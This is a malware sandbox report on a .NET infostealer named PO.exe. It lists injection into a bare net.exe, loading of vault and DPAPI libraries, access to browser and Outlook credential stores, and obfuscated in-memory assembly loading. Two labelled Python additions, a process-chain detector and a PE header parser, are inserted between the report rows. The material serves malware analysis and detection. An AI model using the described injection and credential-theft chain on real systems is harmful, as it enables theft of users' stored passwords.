Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PO.exe.4b9b538.3.raw.unpack, ig4bTw1peNbeeam7US.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PO.exe.4b9b538.3.raw.unpack, ig4bTw1peNbeeam7US.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PO.exe.4b10d18.0.raw.unpack, ig4bTw1peNbeeam7US.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PO.exe.4b10d18.0.raw.unpack, ig4bTw1peNbeeam7US.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@5/5
Source: C:\Users\user\Desktop\PO.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log
Source: C:\Users\user\Desktop\PO.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\net.exe | File created: C:\Users\user\AppData\Local\Temp\35859UlfLq
Source: PO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PO.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: net.exe, 00000007.00000003.2472874960.0000000000664000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3002318934.0000000000688000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2472874960.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO.exe | Virustotal: Detection: 69%
Source: PO.exe | ReversingLabs: Detection: 67%
Source: unknown | Process created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
Source: C:\Users\user\Desktop\PO.exe | Process created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO.exe | Process created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
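The "Process created" rows describe the chain a detection engineer wants to alert on: PO.exe starts a second copy of itself, vfAu7gBmmnuGpQ5Y.exe starts net.exe with nothing but its own path as command line, and that net.exe then launches firefox.exe (the rows further down show net.exe loading winsqlite3.dll, vaultcli.dll and dpapi.dll and holding a browser password-store SQLite schema in memory). A bare net.exe prints its usage text and exits within milliseconds, so a bare instance that survives long enough to spawn a browser is a hollowed host. The script below is an added example and not part of the report or the sample: it runs three checks (self-spawn, bare invocation of a System32/SysWOW64 utility from an unexpected parent, browser child) over constructed process-creation events in a Sysmon-like shape. The report does not show which process started vfAu7gBmmnuGpQ5Y.exe, so the sample gives it a stand-in parent; PIDs are invented.

```python
import ntpath
from collections import defaultdict

# Windows utilities that only do real work when given arguments; a bare instance
# prints usage and exits, so a bare instance that keeps running and spawns
# children is the classic hollowing host. Extend to taste.
LOLBIN_HOSTS = {"net.exe", "net1.exe", "nslookup.exe", "ipconfig.exe", "netstat.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe", "services.exe", "wscript.exe"}

# Constructed events (not from the report): images and command lines follow the
# "Process created" rows above; PIDs and the parent of vfAu7gBmmnuGpQ5Y.exe are
# stand-ins, since the report does not show who started it.
EVENTS = [
    {"pid": 900,  "ppid": 1,    "image": r"C:\Windows\explorer.exe",      "cmd": "explorer.exe"},
    {"pid": 1000, "ppid": 900,  "image": r"C:\Users\user\Desktop\PO.exe", "cmd": r'"C:\Users\user\Desktop\PO.exe"'},
    {"pid": 1001, "ppid": 1000, "image": r"C:\Users\user\Desktop\PO.exe", "cmd": r'"C:\Users\user\Desktop\PO.exe"'},
    {"pid": 1002, "ppid": 900,
     "image": r"C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe",
     "cmd": "vfAu7gBmmnuGpQ5Y.exe"},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Windows\SysWOW64\net.exe",  "cmd": r'"C:\Windows\SysWOW64\net.exe"'},
    {"pid": 1004, "ppid": 1003, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmd": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
    # benign noise: an admin mapping a drive from a shell, a user opening a browser
    {"pid": 2000, "ppid": 900,  "image": r"C:\Windows\System32\cmd.exe",  "cmd": "cmd.exe"},
    {"pid": 2001, "ppid": 2000, "image": r"C:\Windows\System32\net.exe",  "cmd": r"net use Z: \\fileserver\share"},
    {"pid": 2002, "ppid": 900,  "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmd": r'"C:\Program Files\Mozilla Firefox\firefox.exe"'},
]


def _name(path):
    return ntpath.basename(path).lower()


def _bare_invocation(image, cmd):
    """True when the command line is nothing but the image path itself."""
    return cmd.strip().strip('"').lower() == image.lower()


def analyse(events):
    """Return {pid: [reasons]} for processes matching the injection-chain
    pattern: a self-spawn, or a System32/SysWOW64 utility that collects at least
    two of: bare invocation, unexpected parent, browser child."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    findings = {}
    for e in events:
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower() == e["image"].lower():
            reasons.append("self_spawn")
        if _name(e["image"]) in LOLBIN_HOSTS:
            if _bare_invocation(e["image"], e["cmd"]):
                reasons.append("bare_invocation")
            if parent and _name(parent["image"]) not in EXPECTED_PARENTS:
                reasons.append("unusual_parent:" + _name(parent["image"]))
            if {_name(c["image"]) for c in children[e["pid"]]} & BROWSERS:
                reasons.append("spawns_browser")
        if "self_spawn" in reasons or len(reasons) >= 2:
            findings[e["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, why in analyse(EVENTS).items():
        print(pid, ", ".join(why))
```

The two-of-three threshold keeps a stray bare `net.exe` typed at a shell, or an admin script calling `net` from an unusual parent, out of the alert stream; the self-spawn is flagged on its own because a process launching an identical copy of itself with an identical command line is the setup for the suspended-process injection the report's signatures list.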
Source: C:\Users\user\Desktop\PO.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PO.exe | Section loaded: iconcodecservice.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\net.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\PO.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
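The static rows say the file is a 32-bit EXECUTABLE_IMAGE with a single read/execute .text section, carries a populated IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the marker of a managed .NET image, consistent with the TRID guess and the mscoree.dll load) and is linked with DYNAMIC_BASE, NX_COMPAT, NO_SEH and TERMINAL_SERVER_AWARE. All of that lives in the COFF and optional headers and can be confirmed on the file without a sandbox. The parser below is an added example, not code from the report; it reads those fields with the standard library only and is exercised on a constructed minimal PE32 header that sets the same flags (PO.exe itself is not reproduced here).

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
# IMAGE_SECTION_HEADER.Characteristics bits
SECTION_CHARACTERISTICS = {
    0x00000020: "CNT_CODE", 0x00000040: "CNT_INITIALIZED_DATA", 0x00000080: "CNT_UNINITIALIZED_DATA",
    0x20000000: "MEM_EXECUTE", 0x40000000: "MEM_READ", 0x80000000: "MEM_WRITE",
}
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14


def _flags(value, table):
    return sorted(name for bit, name in table.items() if value & bit)


def inspect_pe(data):
    """Decode the header facts a triage needs from raw PE bytes (PE32 or PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, file_chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    pe32plus = magic == 0x20B
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in PE32 and PE32+
    nrva_off = opt + (108 if pe32plus else 92)                # NumberOfRvaAndSizes
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    com_size = 0
    if nrva > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        _, com_size = struct.unpack_from(
            "<II", data, nrva_off + 4 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
    sections = []
    for i in range(nsections):
        name, *_, sec_chars = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         _flags(sec_chars, SECTION_CHARACTERISTICS)))
    return {
        "machine": machine,
        "pe32plus": pe32plus,
        "file_characteristics": _flags(file_chars, FILE_CHARACTERISTICS),
        "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
        "dotnet": com_size != 0,  # populated COM descriptor => managed (.NET) image
        "executable_sections": [n for n, f in sections if "MEM_EXECUTE" in f],
        "sections": sections,
    }


def build_sample_pe():
    """Constructed minimal PE32 header, not PO.exe: one RX .text section, the
    same header flags the report lists, and a non-empty COM descriptor entry."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0002 | 0x0100)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x0400 | 0x8000)   # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x2000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in inspect_pe(blob).items():
        print(f"{key}: {value}")
```

Passing a real file path prints the same fields for it; a managed image with a single executable section and these DllCharacteristics is exactly what a default Visual Studio .NET build produces, so these flags distinguish nothing on their own and the report's verdict rests on the behavioural rows, not on this header.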
Source: Binary string: net.pdbUGP source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO.exe, PO.exe, 00000002.00000002.2275360334.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3004329327.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2281965657.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2278704167.0000000000978000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3004329327.0000000002E20000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: net.pdb source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002888129.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3002681126.000000000097F000.00000002.00000001.01000000.0000000C.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3002866033.000000000097F000.00000002.00000001.01000000.0000000C.sdmp

Data Obfuscation

Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | .Net Code: fY0pZVFRhc System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO.exe.409a508.1.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO.exe.4b10d18.0.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | .Net Code: fY0pZVFRhc System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO.exe.40ba528.2.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO.exe.ba90000.5.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | .Net Code: fY0pZVFRhc System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_0141E958 pushfd ; retf 0_2_0141E959
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_0759BA10 push cs; ret 0_2_0759BA11
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_076A19CD push FFFFFF8Bh; iretd 0_2_076A19CF
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_079045E0 push eax; ret 0_2_079045E1
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_00413863 push ecx; retf E958h 2_2_00413919
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_00401868 push 0000003Dh; retf 2_2_00401899
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_00417828 push esi; iretd 2_2_00417848
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0041F0C3 push edi; iretd 2_2_0041F0CF
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_004031B0 push eax; ret 2_2_004031B2
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_00404B72 push edi; ret 2_2_00404B7A
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0041738C push ds; retf 2_2_004173A1
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_004083BA push esi; iretd 2_2_004083F5
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_00404C4C pushfd ; ret 2_2_00404C4D
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0041556F push eax; retf 2_2_00415572
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_004145BD push 00000034h; iretd 2_2_004145BF
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_00415EBF push esp; iretd 2_2_00415ECC
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_016F09AD push ecx; mov dword ptr [esp], ecx 2_2_016F09B6
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B1120C push esp; iretd 6_2_02B11219
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B12B74 push esi; iretd 6_2_02B12B95
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B108BC push eax; retf 6_2_02B108BF
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B118FB push edx; retf 6_2_02B11901
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02AFFEBF push edi; ret 6_2_02AFFEC7
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B126D9 push ds; retf 6_2_02B126EE
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02AFFF99 pushfd ; ret 6_2_02AFFF9A
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B03707 push esi; iretd 6_2_02B03742
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E509AD push ecx; mov dword ptr [esp], ecx7_2_02E509B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004341D9 push ds; retf 7_2_004341EE
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00438440 push esi; iretd 7_2_0043844A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00438438 push esi; iretd 7_2_0043844A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00434675 push esi; iretd 7_2_00434695
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004306B0 push ecx; retf E958h7_2_00430766
                Source: PO.exeStatic PE information: section name: .text entropy: 7.77210370453255
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, av7ulbitoKQtA90BkM.cs, High entropy of concatenated method names: 'gxVQrX66Qs', 'BIaQ4faSwJ', 'rpFQE95QvW', 'cHxQ6rMHw4', 'fjhQcwqVCl', 'pWkE0V0FAs', 'fytE8JaDUe', 'tCaE5u4XcV', 'RFfEHqbDKo', 'NaQEticUjp'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, c8E47WY3nR71XXLfsaI.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bf1TX2cyQZ', 'nJ5TWy9tKA', 'z37Tqt66FR', 'lkxTVsBumd', 'dbXTO4lWWV', 'njWTBh6NpB', 'L9ETekNkdC'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, bShmESM9SRrFA60ikF.cs, High entropy of concatenated method names: 'kB1ZIfPVf', 'NiLGgX98K', 'GWSD91EeN', 'F9KNvGmte', 'f7Dw8D4BJ', 'mxhxdBwBh', 'wjibBV2G2E9k6Zc9vd', 'EKR5CR7wRb4PFrrwQj', 'hXmKEbZTv', 'csaTqtnCv'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, GmfL8EwbHBh6yTtkOA.cs, High entropy of concatenated method names: 'eESoGpkep6', 'nfQoDiPZGi', 'AFWo1UUTBj', 'lg5owigcPg', 'nQYovpYH6v', 'WZGoInTMpl', 'QHioRli6ol', 'D5VoKVDUbW', 'jXdom9tg9P', 'BGqoT3yU8a'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, hlw9yp8pLPs8k0TdZx.cs, High entropy of concatenated method names: 'vAkRHEDXel', 'vdxRfHwWPC', 'I0KK3HeCCU', 'yv5KY6lCpp', 'yBYRXx0Aa0', 'k67RWjMJH1', 'oNsRqNy5qX', 'DhPRVUKNGB', 'J4bROZdv1w', 'UIIRBby8WM'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, IVOaPb56Xb9OTkQI7M.cs, High entropy of concatenated method names: 'zsJmv6WFyg', 'dfymRc5Uhg', 'KRNmmuJOEq', 'IsjmLhTMEt', 'zfXmsqLC6i', 'bT8mgT6lNP', 'Dispose', 'bC7KUwkUOY', 'JAGK48EQnI', 'eecKoTKaSP'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, kud7D5zoOcgaQh10wk.cs, High entropy of concatenated method names: 'PCiTDs15Zn', 'csFT14Qigy', 'PL1Twt6eVv', 'P3BTi1enV7', 'bw9TSwNDfC', 'kqHTyXC1ap', 'du6TjcFYnC', 'n3oTgn7Vts', 'ROsTP0jrsE', 'J4kTbjFFVQ'
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, aFGfLmtI0beEl6pkeH.cs, High entropy of concatenated method names: 'RBcmiRUW2T', 'QeemSVZh0k', 'W2qmhgaUV9', 'z02myKJgik', 'ycEmjPl8J8', 'vGYmuU65Si', 'yt6m24syK9', 'ko0maksEEM', 'C7ymdUJdWJ', 'wfWm7Ql8As'
